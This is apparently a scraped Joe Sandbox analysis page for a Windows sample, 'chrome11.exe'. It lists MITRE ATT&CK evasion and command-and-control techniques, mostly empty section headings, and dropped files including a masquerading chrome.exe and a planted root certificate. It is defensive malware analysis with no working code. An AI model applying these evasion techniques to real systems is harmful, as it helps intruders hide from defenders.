Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report chrome11.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\Application\chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe:Zone.Identifier

C:\Program Files\Google\Chrome\Application\original.exe (copy)

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\4c26414c92d9e5d65c1ce1a2051839ac_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome11.exe.log

C:\Users\user\AppData\Local\Temp\TmpC435.tmp

C:\Users\user\AppData\Local\Temp\TmpC455.tmp

C:\Users\user\AppData\Local\Temp\rootCert.pfx

C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp

C:\Users\user\AppData\Local\Temp\unique_laptops.txt

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\B388E1820017AEE7F95043ACEE6193EF52EF269E

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
chrome11.exe

Function 00007FF887DF5A79 Relevance: 9.3, Strings: 7, Instructions: 560
COMMON

Function 00007FF887E0326D Relevance: 4.4, Strings: 3, Instructions: 677
COMMON

Function 00007FF887E0036D Relevance: 4.4, Strings: 3, Instructions: 621
COMMON

Function 00007FF887DFBD15 Relevance: 4.3, Strings: 3, Instructions: 572
COMMON

Function 00007FF887DF2E71 Relevance: 3.9, Strings: 3, Instructions: 142
COMMON

Function 00007FF887E00480 Relevance: 3.6, Strings: 2, Instructions: 1104
COMMON

Function 00007FF887E00510 Relevance: 3.5, Strings: 2, Instructions: 1020
COMMON

Function 00007FF887DFDB2E Relevance: 3.4, Strings: 2, Instructions: 915
COMMON

Function 00007FF887DF7FDD Relevance: 3.1, Strings: 2, Instructions: 614
COMMON

Function 00007FF887E003CD Relevance: 3.1, Strings: 2, Instructions: 587
COMMON

Function 00007FF887E0667B Relevance: 3.1, Strings: 2, Instructions: 582
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre